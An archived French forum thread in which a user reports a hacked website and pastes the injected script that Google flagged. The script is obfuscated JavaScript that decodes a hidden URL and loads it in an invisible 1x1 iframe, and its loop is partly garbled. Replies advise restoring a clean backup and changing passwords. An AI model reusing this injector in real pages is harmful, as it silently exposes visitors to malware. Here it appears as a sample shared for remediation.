Toros Posté(e) 17 septembre 2010 Share Posté(e) 17 septembre 2010 Salut à tous, je me permet, une fois de plus, de demander de l'aide sur un sujet complètement déconnecté d'Android ^^ Un site que je fréquente régulièrement c'est peu être fait hacker, et aujourd'hui il affiche un magnifique message d'avertissement quand on s'y rend : http://www.fant-asie.com/ Apparemment c'est du hack, y a eu des mouvements sur le ftp de l'admin hier soir alors qu'il n'y ait pas allé ! Selon selon Google Webmaster Tools, le script infecté est : [removed] function getfncelement(a) { if (a==0) return 'A104A116A116A112A58A47A47A99A108A101A97A11 0A102A105A108A101A46A110A101A116A47A46A112A104A47A50A47'; if (a==1) return 'split'; if (a==2) return 'fromCharCode'; if (a==3) return 'IFRAME'; if (a==4) return 1; } var gnitssssssssssssssssss = String; var a_bnMJnWIagV = getfncelement(0); var a_ErVOWoUayU = a_bnMJnWIagV[getfncelement(1)]("A"); var a_LEdeDyQRPa = ""; for (var a_frOsBBOKcu=1; a_frOsBBOKcu _frOsBBOKcu++) {a_LEdeDyQRPa+=gnitssssssssssssssssss[getfncelement(2)](a_Er VOWoUayU[a_frOsBBOKcu]);} var testFrame = document.createElement(getfncelement(3)); testFrame.src = a_LEdeDyQRPa; testFrame.width = getfncelement(4); testFrame.height = getfncelement(4); document.body.appendChild(testFrame); [removed] Si quelqu'un s'y connait, ou a déjà eu le même genre de problème... Par avance merci... Lien vers le commentaire Partager sur d’autres sites More sharing options...
TheLord Posté(e) 17 septembre 2010 Share Posté(e) 17 septembre 2010 gnitssssssssssssssssss < Ca c'est de la variable mon gars ! Au plus simple il restaure grâce à une sauvegarde son site (que tout bon Webmaster fait au minimum 1 fois par semaine :) ). Ou alors il trouve le code malicieux, et la partie HTML qui le lance, puis bouche la faille de sécurité qui à permis l'accès au petit hacker :) Lien vers le commentaire Partager sur d’autres sites More sharing options...
RodolpheB Posté(e) 17 septembre 2010 Share Posté(e) 17 septembre 2010 Remise à zéro et restauration d'une sauvegarde saine. C'est un peu brutal, mais c'est la seule solution réellement fiable. Ne pas oublier bien entendu de modifier tous les mots de passe. Rodolphe Lien vers le commentaire Partager sur d’autres sites More sharing options...
Toros Posté(e) 17 septembre 2010 Auteur Share Posté(e) 17 septembre 2010 Merci je lui transmet les infos, je pense qu'il avait prévu la resto, mais qu'il est pas chez lui à l'heure actuelle, donc ça attendra ! Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recommended Posts
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.